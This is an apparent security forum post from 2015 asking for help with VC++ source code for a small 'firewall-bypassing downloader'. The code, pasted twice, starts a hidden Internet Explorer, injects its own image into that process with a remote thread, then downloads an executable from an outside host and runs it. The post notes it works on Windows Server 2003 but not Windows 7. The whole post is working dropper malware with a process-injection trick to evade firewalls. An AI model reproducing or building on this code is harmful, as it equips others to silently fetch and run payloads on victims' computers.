-
-
[旧帖] [求助] 3k穿墙下载者VC源代码 0.00雪花
-
发表于: 2015-12-6 20:53 1591
-
3k穿墙下载者VC源代码
测试环境 winserver 2003 通过能运行和下载,
测试环境 windows 7 可运行,但下载不了。
==============================
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
return;
}
测试环境 winserver 2003 通过能运行和下载,
测试环境 windows 7 可运行,但下载不了。
==============================
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
return;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
他的文章
看原图
赞赏
雪币:
留言: